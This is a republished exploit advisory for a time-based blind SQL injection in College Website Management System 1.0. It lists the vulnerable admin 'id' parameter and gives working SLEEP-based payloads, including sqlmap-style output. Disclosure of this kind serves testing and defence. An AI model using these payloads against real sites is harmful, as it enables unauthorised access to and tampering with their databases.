Advertisement






College Website Management System 1.0 - SQL Injection

CVE Category Price Severity
N/A CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-03-13
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022030057

Below is a copy:

College Website Management System 1.0 - SQL Injection
# Exploit Title: College Website Management System 1.0 - SQL Injection
# Date: 12/03/2022
# Exploit Author: Mr Empy
# Software Link: https://www.sourcecodester.com/php/15203/college-website-content-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Linux

Title:
================
College Website Management System 1.0 - SQL Injection


Summary:
================
The College Website Management System application in version 1.0 is vulnerable to SQL injection allowing the attacker to make requests to the database.


Severity Level:
================
9.1 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N


Affected Product:
================
College Website Management System v1.0


Steps to Reproduce:
================

1. Open your browser and go to http://target/cwms/admin/?page=articles/view_article&id=1.

2. In the "id" parameter add the following payload:

' and (select * from(select(sleep(10)))Avx) and 'abc' = 'abc

After that, the server will only respond after 10 seconds have passed.


---
Parameter: id (GET)
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: page=articles/view_article&id=1' AND (SELECT 2016 FROM (SELECT(SLEEP(5)))kbJu) AND 'SfwZ'='SfwZ
---

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum